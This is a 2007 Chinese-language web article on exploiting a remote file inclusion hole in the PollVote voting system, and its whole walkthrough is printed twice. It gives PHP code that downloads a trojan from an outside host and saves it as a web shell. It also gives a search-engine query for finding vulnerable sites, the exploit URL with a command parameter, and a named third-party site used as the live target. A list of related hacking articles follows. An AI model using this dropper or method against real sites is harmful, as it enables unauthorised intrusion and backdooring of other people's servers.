PollVote投票系統(tǒng)漏洞利用
更新時(shí)間:2007年01月16日 00:00:00 作者:
PollVote是一個(gè)投票系統(tǒng),今天看了非安全的雜志,看了利用方法,
不過(guò)作者說(shuō)利用過(guò)程的時(shí)候很煩瑣,關(guān)鍵的時(shí)候又沒說(shuō)明白,
簡(jiǎn)單的說(shuō)一下``
首先建立2個(gè)文本 分別是creatfile.txt和phpdoor.txt
creatfile.txt內(nèi)容寫
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt內(nèi)容就寫個(gè)PHP木馬
之后在http://www.google.com 搜索關(guān)鍵詞"pollvote.php?pollname"
有很多,
搜索到一個(gè)http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
這個(gè)就是利用原理了,
剛才說(shuō)到的creatfile.txt和phpdoor.txt這個(gè)2個(gè)文件都上傳到自己的空間里
執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
這樣
phpdoor.txt里的內(nèi)容就會(huì)生成一個(gè)111.php
這樣我們就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php
不過(guò)作者說(shuō)利用過(guò)程的時(shí)候很煩瑣,關(guān)鍵的時(shí)候又沒說(shuō)明白,
簡(jiǎn)單的說(shuō)一下``
首先建立2個(gè)文本 分別是creatfile.txt和phpdoor.txt
creatfile.txt內(nèi)容寫
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt內(nèi)容就寫個(gè)PHP木馬
之后在http://www.google.com 搜索關(guān)鍵詞"pollvote.php?pollname"
有很多,
搜索到一個(gè)http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
這個(gè)就是利用原理了,
剛才說(shuō)到的creatfile.txt和phpdoor.txt這個(gè)2個(gè)文件都上傳到自己的空間里
執(zhí)行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
這樣
phpdoor.txt里的內(nèi)容就會(huì)生成一個(gè)111.php
這樣我們就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php
您可能感興趣的文章:
- 一個(gè)簡(jiǎn)單的PHP投票程序源碼
- 用ajax實(shí)現(xiàn)的自動(dòng)投票的代碼
- 基于Jquery與WebMethod投票功能實(shí)現(xiàn)代碼
- 基于jQuery的投票系統(tǒng)顯示結(jié)果插件
- PHP投票系統(tǒng)防刷票判斷流程分析
- PHP+MySQL投票系統(tǒng)的設(shè)計(jì)和實(shí)現(xiàn)分享
- 使用js寫的一個(gè)簡(jiǎn)易的投票
- 簡(jiǎn)易的投票系統(tǒng)以及js刷票思路和方法
- PHP+MySQL實(shí)現(xiàn)的簡(jiǎn)單投票系統(tǒng)實(shí)例
- php投票系統(tǒng)之增加與刪除投票(管理員篇)
相關(guān)文章
從搜索參數(shù)過(guò)濾不嚴(yán)到IDC虛擬主機(jī)的滲透
從搜索參數(shù)過(guò)濾不嚴(yán)到IDC虛擬主機(jī)的滲透...2007-01-01緩沖區(qū)溢出:十年來(lái)攻擊和防衛(wèi)的弱點(diǎn)
緩沖區(qū)溢出:十年來(lái)攻擊和防衛(wèi)的弱點(diǎn)...2007-01-01動(dòng)易SQL版新洞利用短信功能直接拿后臺(tái)
動(dòng)易SQL版新洞利用短信功能直接拿后臺(tái)...2007-01-01db_owner權(quán)限得到webshell我的兩點(diǎn)改進(jìn)
db_owner權(quán)限得到webshell我的兩點(diǎn)改進(jìn)...2007-01-01